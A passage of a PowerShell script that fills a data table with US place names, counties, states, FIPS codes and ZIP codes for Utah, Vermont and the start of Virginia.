$Cities.Rows.Add("Provo","Utah","Utah","UT","49","84606") + $null = $Cities.Rows.Add("Aurora","Sevier","Utah","UT","49","84620") + $null = $Cities.Rows.Add("Axtell","Sanpete","Utah","UT","49","84621") + $null = $Cities.Rows.Add("Centerfield","Sanpete","Utah","UT","49","84622") + $null = $Cities.Rows.Add("Chester","Sanpete","Utah","UT","49","84623") + $null = $Cities.Rows.Add("Delta","Millard","Utah","UT","49","84624") + $null = $Cities.Rows.Add("Elberta","Utah","Utah","UT","49","84626") + $null = $Cities.Rows.Add("Ephraim","Sanpete","Utah","UT","49","84627") + $null = $Cities.Rows.Add("Eureka","Juab","Utah","UT","49","84628") + $null = $Cities.Rows.Add("Fairview","Sanpete","Utah","UT","49","84629") + $null = $Cities.Rows.Add("Fayette","Sanpete","Utah","UT","49","84630") + $null = $Cities.Rows.Add("Fillmore","Millard","Utah","UT","49","84631") + $null = $Cities.Rows.Add("Fountain green","Sanpete","Utah","UT","49","84632") + $null = $Cities.Rows.Add("Goshen","Utah","Utah","UT","49","84633") + $null = $Cities.Rows.Add("Gunnison","Sanpete","Utah","UT","49","84634") + $null = $Cities.Rows.Add("Hinckley","Millard","Utah","UT","49","84635") + $null = $Cities.Rows.Add("Holden","Millard","Utah","UT","49","84636") + $null = $Cities.Rows.Add("Kanosh","Millard","Utah","UT","49","84637") + $null = $Cities.Rows.Add("Leamington","Millard","Utah","UT","49","84638") + $null = $Cities.Rows.Add("Levan","Juab","Utah","UT","49","84639") + $null = $Cities.Rows.Add("Lynndyl","Millard","Utah","UT","49","84640") + $null = $Cities.Rows.Add("Manti","Sanpete","Utah","UT","49","84642") + $null = $Cities.Rows.Add("Mayfield","Sanpete","Utah","UT","49","84643") + $null = $Cities.Rows.Add("Mona","Juab","Utah","UT","49","84645") + $null = $Cities.Rows.Add("Moroni","Sanpete","Utah","UT","49","84646") + $null = $Cities.Rows.Add("Mount pleasant","Sanpete","Utah","UT","49","84647") + $null = $Cities.Rows.Add("Nephi","Juab","Utah","UT","49","84648") + $null = $Cities.Rows.Add("Oak city","Millard","Utah","UT","49","84649") + $null = $Cities.Rows.Add("Oasis","Millard","Utah","UT","49","84650") + $null = $Cities.Rows.Add("Payson","Utah","Utah","UT","49","84651") + $null = $Cities.Rows.Add("Redmond","Sevier","Utah","UT","49","84652") + $null = $Cities.Rows.Add("Woodland hills","Utah","Utah","UT","49","84653") + $null = $Cities.Rows.Add("Salina","Sevier","Utah","UT","49","84654") + $null = $Cities.Rows.Add("Genola","Utah","Utah","UT","49","84655") + $null = $Cities.Rows.Add("Scipio","Millard","Utah","UT","49","84656") + $null = $Cities.Rows.Add("Sigurd","Sevier","Utah","UT","49","84657") + $null = $Cities.Rows.Add("Spanish fork","Utah","Utah","UT","49","84660") + $null = $Cities.Rows.Add("Spring city","Sanpete","Utah","UT","49","84662") + $null = $Cities.Rows.Add("Springville","Utah","Utah","UT","49","84663") + $null = $Cities.Rows.Add("Mapleton","Utah","Utah","UT","49","84664") + $null = $Cities.Rows.Add("Wales","Sanpete","Utah","UT","49","84667") + $null = $Cities.Rows.Add("Zcta 846hh","Millard","Utah","UT","49","846HH") + $null = $Cities.Rows.Add("Zcta 846xx","Juab","Utah","UT","49","846XX") + $null = $Cities.Rows.Add("Venice","Sevier","Utah","UT","49","84701") + $null = $Cities.Rows.Add("Alton","Kane","Utah","UT","49","84710") + $null = $Cities.Rows.Add("Annabella","Sevier","Utah","UT","49","84711") + $null = $Cities.Rows.Add("Antimony","Garfield","Utah","UT","49","84712") + $null = $Cities.Rows.Add("Beaver","Beaver","Utah","UT","49","84713") + $null = $Cities.Rows.Add("Beryl","Iron","Utah","UT","49","84714") + $null = $Cities.Rows.Add("Bicknell","Wayne","Utah","UT","49","84715") + $null = $Cities.Rows.Add("Boulder","Garfield","Utah","UT","49","84716") + $null = $Cities.Rows.Add("Bryce canyon","Garfield","Utah","UT","49","84717") + $null = $Cities.Rows.Add("Cannonville","Garfield","Utah","UT","49","84718") + $null = $Cities.Rows.Add("Brian head","Iron","Utah","UT","49","84719") + $null = $Cities.Rows.Add("Pintura","Iron","Utah","UT","49","84720") + $null = $Cities.Rows.Add("Central","Washington","Utah","UT","49","84722") + $null = $Cities.Rows.Add("Circleville","Piute","Utah","UT","49","84723") + $null = $Cities.Rows.Add("Elsinore","Sevier","Utah","UT","49","84724") + $null = $Cities.Rows.Add("Enterprise","Washington","Utah","UT","49","84725") + $null = $Cities.Rows.Add("Escalante","Garfield","Utah","UT","49","84726") + $null = $Cities.Rows.Add("Garrison","Millard","Utah","UT","49","84728") + $null = $Cities.Rows.Add("Glendale","Kane","Utah","UT","49","84729") + $null = $Cities.Rows.Add("Glenwood","Sevier","Utah","UT","49","84730") + $null = $Cities.Rows.Add("Greenville","Beaver","Utah","UT","49","84731") + $null = $Cities.Rows.Add("Greenwich","Piute","Utah","UT","49","84732") + $null = $Cities.Rows.Add("Gunlock","Washington","Utah","UT","49","84733") + $null = $Cities.Rows.Add("Hanksville","Wayne","Utah","UT","49","84734") + $null = $Cities.Rows.Add("Hatch","Garfield","Utah","UT","49","84735") + $null = $Cities.Rows.Add("Henrieville","Garfield","Utah","UT","49","84736") + $null = $Cities.Rows.Add("Hurricane","Washington","Utah","UT","49","84737") + $null = $Cities.Rows.Add("Ivins","Washington","Utah","UT","49","84738") + $null = $Cities.Rows.Add("Joseph","Sevier","Utah","UT","49","84739") + $null = $Cities.Rows.Add("Junction","Piute","Utah","UT","49","84740") + $null = $Cities.Rows.Add("Big water","Kane","Utah","UT","49","84741") + $null = $Cities.Rows.Add("Kingston","Piute","Utah","UT","49","84743") + $null = $Cities.Rows.Add("Koosharem","Sevier","Utah","UT","49","84744") + $null = $Cities.Rows.Add("La verkin","Washington","Utah","UT","49","84745") + $null = $Cities.Rows.Add("Fremont","Wayne","Utah","UT","49","84747") + $null = $Cities.Rows.Add("Lyman","Wayne","Utah","UT","49","84749") + $null = $Cities.Rows.Add("Marysvale","Piute","Utah","UT","49","84750") + $null = $Cities.Rows.Add("Milford","Beaver","Utah","UT","49","84751") + $null = $Cities.Rows.Add("Minersville","Beaver","Utah","UT","49","84752") + $null = $Cities.Rows.Add("Modena","Iron","Utah","UT","49","84753") + $null = $Cities.Rows.Add("Austin","Sevier","Utah","UT","49","84754") + $null = $Cities.Rows.Add("Mount carmel","Kane","Utah","UT","49","84755") + $null = $Cities.Rows.Add("New harmony","Washington","Utah","UT","49","84757") + $null = $Cities.Rows.Add("Orderville","Kane","Utah","UT","49","84758") + $null = $Cities.Rows.Add("Panguitch","Garfield","Utah","UT","49","84759") + $null = $Cities.Rows.Add("Paragonah","Iron","Utah","UT","49","84760") + $null = $Cities.Rows.Add("Parowan","Iron","Utah","UT","49","84761") + $null = $Cities.Rows.Add("Duck creek villa","Kane","Utah","UT","49","84762") + $null = $Cities.Rows.Add("Bryce","Garfield","Utah","UT","49","84764") + $null = $Cities.Rows.Add("Santa clara","Washington","Utah","UT","49","84765") + $null = $Cities.Rows.Add("Sevier","Sevier","Utah","UT","49","84766") + $null = $Cities.Rows.Add("St george","Washington","Utah","UT","49","84770") + $null = $Cities.Rows.Add("Summit","Iron","Utah","UT","49","84772") + $null = $Cities.Rows.Add("Teasdale","Wayne","Utah","UT","49","84773") + $null = $Cities.Rows.Add("Toquerville","Washington","Utah","UT","49","84774") + $null = $Cities.Rows.Add("Torrey","Wayne","Utah","UT","49","84775") + $null = $Cities.Rows.Add("Tropic","Garfield","Utah","UT","49","84776") + $null = $Cities.Rows.Add("Virgin","Washington","Utah","UT","49","84779") + $null = $Cities.Rows.Add("Washington","Washington","Utah","UT","49","84780") + $null = $Cities.Rows.Add("Pine valley","Washington","Utah","UT","49","84781") + $null = $Cities.Rows.Add("Veyo","Washington","Utah","UT","49","84782") + $null = $Cities.Rows.Add("Dammeron valley","Washington","Utah","UT","49","84783") + $null = $Cities.Rows.Add("Zcta 84790","Washington","Utah","UT","49","84790") + $null = $Cities.Rows.Add("Zcta 847hh","Garfield","Utah","UT","49","847HH") + $null = $Cities.Rows.Add("Zcta 847xx","Piute","Utah","UT","49","847XX") + $null = $Cities.Rows.Add("","San Juan","Utah","UT","49","86044") + $null = $Cities.Rows.Add("","San Juan","Utah","UT","49","860HH") + $null = $Cities.Rows.Add("","San Juan","Utah","UT","49","86514") + $null = $Cities.Rows.Add("White river junc","Windsor","Vermont","VT","50","05001") + $null = $Cities.Rows.Add("Barnard","Windsor","Vermont","VT","50","05031") + $null = $Cities.Rows.Add("Bethel","Windsor","Vermont","VT","50","05032") + $null = $Cities.Rows.Add("Bradford","Orange","Vermont","VT","50","05033") + $null = $Cities.Rows.Add("Bridgewater","Windsor","Vermont","VT","50","05034") + $null = $Cities.Rows.Add("Bridgewater corn","Windsor","Vermont","VT","50","05035") + $null = $Cities.Rows.Add("Brookfield","Orange","Vermont","VT","50","05036") + $null = $Cities.Rows.Add("Brownsville","Windsor","Vermont","VT","50","05037") + $null = $Cities.Rows.Add("Chelsea","Orange","Vermont","VT","50","05038") + $null = $Cities.Rows.Add("Corinth","Orange","Vermont","VT","50","05039") + $null = $Cities.Rows.Add("East corinth","Orange","Vermont","VT","50","05040") + $null = $Cities.Rows.Add("East randolph","Orange","Vermont","VT","50","05041") + $null = $Cities.Rows.Add("Ryegate","Caledonia","Vermont","VT","50","05042") + $null = $Cities.Rows.Add("East thetford","Orange","Vermont","VT","50","05043") + $null = $Cities.Rows.Add("Fairlee","Orange","Vermont","VT","50","05045") + $null = $Cities.Rows.Add("Groton","Caledonia","Vermont","VT","50","05046") + $null = $Cities.Rows.Add("Hartland","Windsor","Vermont","VT","50","05048") + $null = $Cities.Rows.Add("Newbury","Orange","Vermont","VT","50","05051") + $null = $Cities.Rows.Add("North hartland","Windsor","Vermont","VT","50","05052") + $null = $Cities.Rows.Add("North pomfret","Windsor","Vermont","VT","50","05053") + $null = $Cities.Rows.Add("North thetford","Orange","Vermont","VT","50","05054") + $null = $Cities.Rows.Add("Norwich","Windsor","Vermont","VT","50","05055") + $null = $Cities.Rows.Add("Plymouth","Windsor","Vermont","VT","50","05056") + $null = $Cities.Rows.Add("Post mills","Orange","Vermont","VT","50","05058") + $null = $Cities.Rows.Add("Quechee","Windsor","Vermont","VT","50","05059") + $null = $Cities.Rows.Add("Randolph","Orange","Vermont","VT","50","05060") + $null = $Cities.Rows.Add("Randolph center","Orange","Vermont","VT","50","05061") + $null = $Cities.Rows.Add("Reading","Windsor","Vermont","VT","50","05062") + $null = $Cities.Rows.Add("Sharon","Windsor","Vermont","VT","50","05065") + $null = $Cities.Rows.Add("South pomfret","Windsor","Vermont","VT","50","05067") + $null = $Cities.Rows.Add("South royalton","Windsor","Vermont","VT","50","05068") + $null = $Cities.Rows.Add("South ryegate","Caledonia","Vermont","VT","50","05069") + $null = $Cities.Rows.Add("South strafford","Orange","Vermont","VT","50","05070") + $null = $Cities.Rows.Add("South woodstock","Windsor","Vermont","VT","50","05071") + $null = $Cities.Rows.Add("Strafford","Orange","Vermont","VT","50","05072") + $null = $Cities.Rows.Add("Taftsville","Windsor","Vermont","VT","50","05073") + $null = $Cities.Rows.Add("Thetford","Orange","Vermont","VT","50","05074") + $null = $Cities.Rows.Add("Thetford center","Orange","Vermont","VT","50","05075") + $null = $Cities.Rows.Add("East corinth","Orange","Vermont","VT","50","05076") + $null = $Cities.Rows.Add("Tunbridge","Orange","Vermont","VT","50","05077") + $null = $Cities.Rows.Add("Vershire","Orange","Vermont","VT","50","05079") + $null = $Cities.Rows.Add("Wells river","Orange","Vermont","VT","50","05081") + $null = $Cities.Rows.Add("West fairlee","Orange","Vermont","VT","50","05083") + $null = $Cities.Rows.Add("West hartford","Windsor","Vermont","VT","50","05084") + $null = $Cities.Rows.Add("West newbury","Orange","Vermont","VT","50","05085") + $null = $Cities.Rows.Add("West topsham","Orange","Vermont","VT","50","05086") + $null = $Cities.Rows.Add("Wilder","Windsor","Vermont","VT","50","05088") + $null = $Cities.Rows.Add("Windsor","Windsor","Vermont","VT","50","05089") + $null = $Cities.Rows.Add("Woodstock","Windsor","Vermont","VT","50","05091") + $null = $Cities.Rows.Add("Zcta 050hh","Windsor","Vermont","VT","50","050HH") + $null = $Cities.Rows.Add("Bellows falls","Windham","Vermont","VT","50","05101") + $null = $Cities.Rows.Add("Cavendish","Windsor","Vermont","VT","50","05142") + $null = $Cities.Rows.Add("Chester","Windsor","Vermont","VT","50","05143") + $null = $Cities.Rows.Add("Grafton","Windham","Vermont","VT","50","05146") + $null = $Cities.Rows.Add("Bromley mtn","Windham","Vermont","VT","50","05148") + $null = $Cities.Rows.Add("Ludlow","Windsor","Vermont","VT","50","05149") + $null = $Cities.Rows.Add("North springfiel","Windsor","Vermont","VT","50","05150") + $null = $Cities.Rows.Add("Perkinsville","Windsor","Vermont","VT","50","05151") + $null = $Cities.Rows.Add("Peru","Bennington","Vermont","VT","50","05152") + $null = $Cities.Rows.Add("Proctorsville","Windsor","Vermont","VT","50","05153") + $null = $Cities.Rows.Add("Saxtons river","Windham","Vermont","VT","50","05154") + $null = $Cities.Rows.Add("South londonderr","Windham","Vermont","VT","50","05155") + $null = $Cities.Rows.Add("Springfield","Windsor","Vermont","VT","50","05156") + $null = $Cities.Rows.Add("Westminster","Windham","Vermont","VT","50","05158") + $null = $Cities.Rows.Add("Weston","Windsor","Vermont","VT","50","05161") + $null = $Cities.Rows.Add("Bennington","Bennington","Vermont","VT","50","05201") + $null = $Cities.Rows.Add("Arlington","Bennington","Vermont","VT","50","05250") + $null = $Cities.Rows.Add("Dorset","Bennington","Vermont","VT","50","05251") + $null = $Cities.Rows.Add("East arlington","Bennington","Vermont","VT","50","05252") + $null = $Cities.Rows.Add("East dorset","Bennington","Vermont","VT","50","05253") + $null = $Cities.Rows.Add("Manchester","Bennington","Vermont","VT","50","05254") + $null = $Cities.Rows.Add("Manchester cente","Bennington","Vermont","VT","50","05255") + $null = $Cities.Rows.Add("North bennington","Bennington","Vermont","VT","50","05257") + $null = $Cities.Rows.Add("North pownal","Bennington","Vermont","VT","50","05260") + $null = $Cities.Rows.Add("Pownal","Bennington","Vermont","VT","50","05261") + $null = $Cities.Rows.Add("Shaftsbury","Bennington","Vermont","VT","50","05262") + $null = $Cities.Rows.Add("Brattleboro","Windham","Vermont","VT","50","05301") + $null = $Cities.Rows.Add("Bondville","Bennington","Vermont","VT","50","05340") + $null = $Cities.Rows.Add("East dover","Windham","Vermont","VT","50","05341") + $null = $Cities.Rows.Add("Jacksonville","Windham","Vermont","VT","50","05342") + $null = $Cities.Rows.Add("Jamaica","Windham","Vermont","VT","50","05343") + $null = $Cities.Rows.Add("Marlboro","Windham","Vermont","VT","50","05344") + $null = $Cities.Rows.Add("Newfane","Windham","Vermont","VT","50","05345") + $null = $Cities.Rows.Add("Putney","Windham","Vermont","VT","50","05346") + $null = $Cities.Rows.Add("Readsboro","Bennington","Vermont","VT","50","05350") + $null = $Cities.Rows.Add("South newfane","Windham","Vermont","VT","50","05351") + $null = $Cities.Rows.Add("Stamford","Bennington","Vermont","VT","50","05352") + $null = $Cities.Rows.Add("Townshend","Windham","Vermont","VT","50","05353") + $null = $Cities.Rows.Add("Vernon","Windham","Vermont","VT","50","05354") + $null = $Cities.Rows.Add("Wardsboro","Windham","Vermont","VT","50","05355") + $null = $Cities.Rows.Add("Mount snow","Windham","Vermont","VT","50","05356") + $null = $Cities.Rows.Add("West halifax","Windham","Vermont","VT","50","05358") + $null = $Cities.Rows.Add("West townshend","Windham","Vermont","VT","50","05359") + $null = $Cities.Rows.Add("West wardsboro","Windham","Vermont","VT","50","05360") + $null = $Cities.Rows.Add("Whitingham","Windham","Vermont","VT","50","05361") + $null = $Cities.Rows.Add("Williamsville","Windham","Vermont","VT","50","05362") + $null = $Cities.Rows.Add("Wilmington","Windham","Vermont","VT","50","05363") + $null = $Cities.Rows.Add("Zcta 053hh","Windham","Vermont","VT","50","053HH") + $null = $Cities.Rows.Add("Zcta 053xx","Windham","Vermont","VT","50","053XX") + $null = $Cities.Rows.Add("Burlington","Chittenden","Vermont","VT","50","05401") + $null = $Cities.Rows.Add("South burlington","Chittenden","Vermont","VT","50","05403") + $null = $Cities.Rows.Add("Winooski","Chittenden","Vermont","VT","50","05404") + $null = $Cities.Rows.Add("Alburg","Grand Isle","Vermont","VT","50","05440") + $null = $Cities.Rows.Add("Bakersfield","Franklin","Vermont","VT","50","05441") + $null = $Cities.Rows.Add("Belvidere center","Lamoille","Vermont","VT","50","05442") + $null = $Cities.Rows.Add("Bristol","Addison","Vermont","VT","50","05443") + $null = $Cities.Rows.Add("Cambridge","Franklin","Vermont","VT","50","05444") + $null = $Cities.Rows.Add("Charlotte","Chittenden","Vermont","VT","50","05445") + $null = $Cities.Rows.Add("Colchester","Chittenden","Vermont","VT","50","05446") + $null = $Cities.Rows.Add("East fairfield","Franklin","Vermont","VT","50","05448") + $null = $Cities.Rows.Add("Enosburg falls","Franklin","Vermont","VT","50","05450") + $null = $Cities.Rows.Add("Essex junction","Chittenden","Vermont","VT","50","05452") + $null = $Cities.Rows.Add("Fairfax","Franklin","Vermont","VT","50","05454") + $null = $Cities.Rows.Add("Fairfield","Franklin","Vermont","VT","50","05455") + $null = $Cities.Rows.Add("Ferrisburg","Addison","Vermont","VT","50","05456") + $null = $Cities.Rows.Add("Franklin","Franklin","Vermont","VT","50","05457") + $null = $Cities.Rows.Add("Grand isle","Grand Isle","Vermont","VT","50","05458") + $null = $Cities.Rows.Add("Highgate center","Franklin","Vermont","VT","50","05459") + $null = $Cities.Rows.Add("Hinesburg","Chittenden","Vermont","VT","50","05461") + $null = $Cities.Rows.Add("Huntington","Chittenden","Vermont","VT","50","05462") + $null = $Cities.Rows.Add("Isle la motte","Grand Isle","Vermont","VT","50","05463") + $null = $Cities.Rows.Add("Smugglers notch","Lamoille","Vermont","VT","50","05464") + $null = $Cities.Rows.Add("Jericho center","Chittenden","Vermont","VT","50","05465") + $null = $Cities.Rows.Add("Milton","Chittenden","Vermont","VT","50","05468") + $null = $Cities.Rows.Add("Montgomery cente","Franklin","Vermont","VT","50","05471") + $null = $Cities.Rows.Add("New haven","Addison","Vermont","VT","50","05472") + $null = $Cities.Rows.Add("North ferrisburg","Addison","Vermont","VT","50","05473") + $null = $Cities.Rows.Add("North hero","Grand Isle","Vermont","VT","50","05474") + $null = $Cities.Rows.Add("Richford","Franklin","Vermont","VT","50","05476") + $null = $Cities.Rows.Add("Bolton valley","Chittenden","Vermont","VT","50","05477") + $null = $Cities.Rows.Add("Saint albans","Franklin","Vermont","VT","50","05478") + $null = $Cities.Rows.Add("Shelburne","Chittenden","Vermont","VT","50","05482") + $null = $Cities.Rows.Add("Sheldon","Franklin","Vermont","VT","50","05483") + $null = $Cities.Rows.Add("South hero","Grand Isle","Vermont","VT","50","05486") + $null = $Cities.Rows.Add("Starksboro","Addison","Vermont","VT","50","05487") + $null = $Cities.Rows.Add("Swanton","Franklin","Vermont","VT","50","05488") + $null = $Cities.Rows.Add("Underhill","Chittenden","Vermont","VT","50","05489") + $null = $Cities.Rows.Add("Vergennes","Addison","Vermont","VT","50","05491") + $null = $Cities.Rows.Add("Waterville","Lamoille","Vermont","VT","50","05492") + $null = $Cities.Rows.Add("Westford","Chittenden","Vermont","VT","50","05494") + $null = $Cities.Rows.Add("Williston","Chittenden","Vermont","VT","50","05495") + $null = $Cities.Rows.Add("Zcta 054hh","Addison","Vermont","VT","50","054HH") + $null = $Cities.Rows.Add("Montpelier","Washington","Vermont","VT","50","05602") + $null = $Cities.Rows.Add("Adamant","Washington","Vermont","VT","50","05640") + $null = $Cities.Rows.Add("Barre","Washington","Vermont","VT","50","05641") + $null = $Cities.Rows.Add("Cabot","Washington","Vermont","VT","50","05647") + $null = $Cities.Rows.Add("Calais","Washington","Vermont","VT","50","05648") + $null = $Cities.Rows.Add("East barre","Orange","Vermont","VT","50","05649") + $null = $Cities.Rows.Add("East calais","Washington","Vermont","VT","50","05650") + $null = $Cities.Rows.Add("East montpelier","Washington","Vermont","VT","50","05651") + $null = $Cities.Rows.Add("Eden","Lamoille","Vermont","VT","50","05652") + $null = $Cities.Rows.Add("Eden mills","Lamoille","Vermont","VT","50","05653") + $null = $Cities.Rows.Add("Graniteville","Washington","Vermont","VT","50","05654") + $null = $Cities.Rows.Add("Hyde park","Lamoille","Vermont","VT","50","05655") + $null = $Cities.Rows.Add("Johnson","Lamoille","Vermont","VT","50","05656") + $null = $Cities.Rows.Add("Lake elmore","Lamoille","Vermont","VT","50","05657") + $null = $Cities.Rows.Add("Marshfield","Washington","Vermont","VT","50","05658") + $null = $Cities.Rows.Add("Moretown","Washington","Vermont","VT","50","05660") + $null = $Cities.Rows.Add("Morrisville","Lamoille","Vermont","VT","50","05661") + $null = $Cities.Rows.Add("Riverton","Washington","Vermont","VT","50","05663") + $null = $Cities.Rows.Add("Northfield falls","Washington","Vermont","VT","50","05664") + $null = $Cities.Rows.Add("North montpelier","Washington","Vermont","VT","50","05666") + $null = $Cities.Rows.Add("Plainfield","Washington","Vermont","VT","50","05667") + $null = $Cities.Rows.Add("Roxbury","Washington","Vermont","VT","50","05669") + $null = $Cities.Rows.Add("Stowe","Lamoille","Vermont","VT","50","05672") + $null = $Cities.Rows.Add("Waitsfield","Washington","Vermont","VT","50","05673") + $null = $Cities.Rows.Add("Sugarbush valley","Washington","Vermont","VT","50","05674") + $null = $Cities.Rows.Add("Washgtin","Orange","Vermont","VT","50","05675") + $null = $Cities.Rows.Add("Waterbury","Washington","Vermont","VT","50","05676") + $null = $Cities.Rows.Add("Waterbury center","Washington","Vermont","VT","50","05677") + $null = $Cities.Rows.Add("Websterville","Washington","Vermont","VT","50","05678") + $null = $Cities.Rows.Add("Williamstown","Orange","Vermont","VT","50","05679") + $null = $Cities.Rows.Add("Wolcott","Lamoille","Vermont","VT","50","05680") + $null = $Cities.Rows.Add("Woodbury","Washington","Vermont","VT","50","05681") + $null = $Cities.Rows.Add("Worcester","Washington","Vermont","VT","50","05682") + $null = $Cities.Rows.Add("Zcta 056hh","Caledonia","Vermont","VT","50","056HH") + $null = $Cities.Rows.Add("Rutland","Rutland","Vermont","VT","50","05701") + $null = $Cities.Rows.Add("Belmont","Rutland","Vermont","VT","50","05730") + $null = $Cities.Rows.Add("Hubbardton","Rutland","Vermont","VT","50","05732") + $null = $Cities.Rows.Add("Brandon","Rutland","Vermont","VT","50","05733") + $null = $Cities.Rows.Add("Bridport","Addison","Vermont","VT","50","05734") + $null = $Cities.Rows.Add("Castleton","Rutland","Vermont","VT","50","05735") + $null = $Cities.Rows.Add("Center rutland","Rutland","Vermont","VT","50","05736") + $null = $Cities.Rows.Add("Chittenden","Rutland","Vermont","VT","50","05737") + $null = $Cities.Rows.Add("Cuttingsville","Rutland","Vermont","VT","50","05738") + $null = $Cities.Rows.Add("Danby","Rutland","Vermont","VT","50","05739") + $null = $Cities.Rows.Add("East wallingford","Rutland","Vermont","VT","50","05742") + $null = $Cities.Rows.Add("Fair haven","Rutland","Vermont","VT","50","05743") + $null = $Cities.Rows.Add("Florence","Rutland","Vermont","VT","50","05744") + $null = $Cities.Rows.Add("Gaysville","Windsor","Vermont","VT","50","05746") + $null = $Cities.Rows.Add("Granville","Addison","Vermont","VT","50","05747") + $null = $Cities.Rows.Add("Hancock","Addison","Vermont","VT","50","05748") + $null = $Cities.Rows.Add("Hydeville","Rutland","Vermont","VT","50","05750") + $null = $Cities.Rows.Add("Killington","Rutland","Vermont","VT","50","05751") + $null = $Cities.Rows.Add("Bread loaf","Addison","Vermont","VT","50","05753") + $null = $Cities.Rows.Add("Middletown sprin","Rutland","Vermont","VT","50","05757") + $null = $Cities.Rows.Add("Mount holly","Rutland","Vermont","VT","50","05758") + $null = $Cities.Rows.Add("North clarendon","Rutland","Vermont","VT","50","05759") + $null = $Cities.Rows.Add("Orwell","Addison","Vermont","VT","50","05760") + $null = $Cities.Rows.Add("Pawlet","Rutland","Vermont","VT","50","05761") + $null = $Cities.Rows.Add("Pittsfield","Rutland","Vermont","VT","50","05762") + $null = $Cities.Rows.Add("Pittsford","Rutland","Vermont","VT","50","05763") + $null = $Cities.Rows.Add("Poultney","Rutland","Vermont","VT","50","05764") + $null = $Cities.Rows.Add("Proctor","Rutland","Vermont","VT","50","05765") + $null = $Cities.Rows.Add("Ripton","Addison","Vermont","VT","50","05766") + $null = $Cities.Rows.Add("Rochester","Windsor","Vermont","VT","50","05767") + $null = $Cities.Rows.Add("Salisbury","Addison","Vermont","VT","50","05769") + $null = $Cities.Rows.Add("Shoreham","Addison","Vermont","VT","50","05770") + $null = $Cities.Rows.Add("Stockbridge","Windsor","Vermont","VT","50","05772") + $null = $Cities.Rows.Add("Wallingford","Rutland","Vermont","VT","50","05773") + $null = $Cities.Rows.Add("Wells","Rutland","Vermont","VT","50","05774") + $null = $Cities.Rows.Add("West pawlet","Rutland","Vermont","VT","50","05775") + $null = $Cities.Rows.Add("West rupert","Bennington","Vermont","VT","50","05776") + $null = $Cities.Rows.Add("West rutland","Rutland","Vermont","VT","50","05777") + $null = $Cities.Rows.Add("Leicester juncti","Addison","Vermont","VT","50","05778") + $null = $Cities.Rows.Add("Zcta 057hh","Addison","Vermont","VT","50","057HH") + $null = $Cities.Rows.Add("Saint johnsbury","Caledonia","Vermont","VT","50","05819") + $null = $Cities.Rows.Add("Albany","Orleans","Vermont","VT","50","05820") + $null = $Cities.Rows.Add("Barnet","Caledonia","Vermont","VT","50","05821") + $null = $Cities.Rows.Add("Barton","Orleans","Vermont","VT","50","05822") + $null = $Cities.Rows.Add("Concord","Essex","Vermont","VT","50","05824") + $null = $Cities.Rows.Add("Coventry","Orleans","Vermont","VT","50","05825") + $null = $Cities.Rows.Add("Craftsbury","Orleans","Vermont","VT","50","05826") + $null = $Cities.Rows.Add("Craftsbury commo","Orleans","Vermont","VT","50","05827") + $null = $Cities.Rows.Add("Danville","Caledonia","Vermont","VT","50","05828") + $null = $Cities.Rows.Add("Derby","Orleans","Vermont","VT","50","05829") + $null = $Cities.Rows.Add("Derby line","Orleans","Vermont","VT","50","05830") + $null = $Cities.Rows.Add("East burke","Caledonia","Vermont","VT","50","05832") + $null = $Cities.Rows.Add("East charleston","Orleans","Vermont","VT","50","05833") + $null = $Cities.Rows.Add("East hardwick","Caledonia","Vermont","VT","50","05836") + $null = $Cities.Rows.Add("East haven","Essex","Vermont","VT","50","05837") + $null = $Cities.Rows.Add("Glover","Orleans","Vermont","VT","50","05839") + $null = $Cities.Rows.Add("Granby","Essex","Vermont","VT","50","05840") + $null = $Cities.Rows.Add("Greensboro","Orleans","Vermont","VT","50","05841") + $null = $Cities.Rows.Add("Greensboro bend","Orleans","Vermont","VT","50","05842") + $null = $Cities.Rows.Add("Hardwick","Caledonia","Vermont","VT","50","05843") + $null = $Cities.Rows.Add("Irasburg","Orleans","Vermont","VT","50","05845") + $null = $Cities.Rows.Add("Island pond","Essex","Vermont","VT","50","05846") + $null = $Cities.Rows.Add("Lowell","Orleans","Vermont","VT","50","05847") + $null = $Cities.Rows.Add("Lyndonville","Caledonia","Vermont","VT","50","05851") + $null = $Cities.Rows.Add("Morgan ctr","Orleans","Vermont","VT","50","05853") + $null = $Cities.Rows.Add("Newport","Orleans","Vermont","VT","50","05855") + $null = $Cities.Rows.Add("Newport center","Orleans","Vermont","VT","50","05857") + $null = $Cities.Rows.Add("North concord","Essex","Vermont","VT","50","05858") + $null = $Cities.Rows.Add("Jay peak","Orleans","Vermont","VT","50","05859") + $null = $Cities.Rows.Add("Orleans","Orleans","Vermont","VT","50","05860") + $null = $Cities.Rows.Add("Sheffield","Caledonia","Vermont","VT","50","05866") + $null = $Cities.Rows.Add("Sutton","Caledonia","Vermont","VT","50","05867") + $null = $Cities.Rows.Add("Troy","Orleans","Vermont","VT","50","05868") + $null = $Cities.Rows.Add("West burke","Caledonia","Vermont","VT","50","05871") + $null = $Cities.Rows.Add("West charleston","Orleans","Vermont","VT","50","05872") + $null = $Cities.Rows.Add("West danville","Caledonia","Vermont","VT","50","05873") + $null = $Cities.Rows.Add("Westfield","Orleans","Vermont","VT","50","05874") + $null = $Cities.Rows.Add("West glover","Orleans","Vermont","VT","50","05875") + $null = $Cities.Rows.Add("Zcta 058hh","Caledonia","Vermont","VT","50","058HH") + $null = $Cities.Rows.Add("Beecher falls","Essex","Vermont","VT","50","05902") + $null = $Cities.Rows.Add("Canaan","Essex","Vermont","VT","50","05903") + $null = $Cities.Rows.Add("Gilman","Essex","Vermont","VT","50","05904") + $null = $Cities.Rows.Add("Guildhall","Essex","Vermont","VT","50","05905") + $null = $Cities.Rows.Add("Lunenburg","Essex","Vermont","VT","50","05906") + $null = $Cities.Rows.Add("Norton","Essex","Vermont","VT","50","05907") + $null = $Cities.Rows.Add("Zcta 20105","Loudoun","Virginia","VA","51","20105") + $null = $Cities.Rows.Add("Zcta 20106","Culpeper","Virginia","VA","51","20106") + $null = $Cities.Rows.Add("Zcta 20109","Prince William","Virginia","VA","51","20109") + $null = $Cities.Rows.Add("Zcta 20110","Manassas city","Virginia","VA","51","20110") + $null = $Cities.Rows.Add("Zcta 20111","Prince William","Virginia","VA","51","20111") + $null = $Cities.Rows.Add("Zcta 20112","Prince William","Virginia","VA","51","20112") + $null = $Cities.Rows.Add("Zcta 20115","Fauquier","Virginia","VA","51","20115") + $null = $Cities.Rows.Add("Zcta 20117","Loudoun","Virginia","VA","51","20117") + $null = $Cities.Rows.Add("Zcta 20118","Loudoun","Virginia","VA","51","20118") + $null = $Cities.Rows.Add("Zcta 20119","Fauquier","Virginia","VA","51","20119") + $null = $Cities.Rows.Add("Zcta 20120","Fairfax","Virginia","VA","51","20120") + $null = $Cities.Rows.Add("Zcta 